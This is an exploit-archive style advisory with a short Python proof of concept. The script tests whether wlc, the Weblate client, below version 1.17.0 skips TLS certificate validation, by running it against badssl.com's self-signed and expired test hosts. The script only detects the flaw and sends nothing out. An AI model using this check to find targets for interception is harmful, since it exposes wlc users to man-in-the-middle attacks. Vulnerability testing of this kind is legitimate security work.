=============================================================================================================================================
| # Title     : SSL Certificate Validation Bypass in wlc Versions Below 1.17.0                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
| # Vendor    : https://ubuntu.com/security/notices/USN-7981-1                                                                              |
=============================================================================================================================================

[+] Summary    : This Proof of Concept (PoC) demonstrates a security issue in wlc versions earlier than 1.17.0, where SSL/TLS certificate validation can be bypassed. 
                 By attempting connections to endpoints with invalid certificates (such as self‑signed or expired certificates), the PoC verifies whether wlc accepts the connection without proper SSL verification. 
                 Successful execution indicates that a Man‑in‑the‑Middle (MITM) attacker could intercept or manipulate communications. The PoC is intended strictly for educational and controlled testing environments.

[+] POC : python poc.py

#!/usr/bin/env python3

import subprocess
import sys
import shutil

def test_ssl_bypass(url):
  
    print(f"[*] Testing URL: {url}")

    if not shutil.which("wlc"):
        print("[!] The 'wlc' tool was not found in the system path.")
        return False

    try:

        cmd = ["wlc", "--weblate-url", url, "list-projects"]
        result = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=10
        )

        print(f"[*] Standard Output (STDOUT): {result.stdout[:100]}...")
        print(f"[*] Standard Error (STDERR): {result.stderr[:100]}...")
        print(f"[*] Exit Code: {result.returncode}")

        return result.returncode == 0

    except subprocess.TimeoutExpired:
        print("[!] Connection timed out.")
        return False
    except FileNotFoundError:
        print("[!] Failed to execute 'wlc' (not found or not executable).")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

if __name__ == "__main__":

    test_urls = [
        "https://self-signed.badssl.com/",
        "https://expired.badssl.com/",
    ]

    print("[*] Testing for SSL Bypass vulnerability in wlc")
    print("[*] Target version: < 1.17.0")

    for url in test_urls:
        if test_ssl_bypass(url):
            print(f"[OK] SSL verification bypassed for: {url}")
            print("[!] Vulnerability confirmed: An MITM attacker could intercept the connection.")
            break
		
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================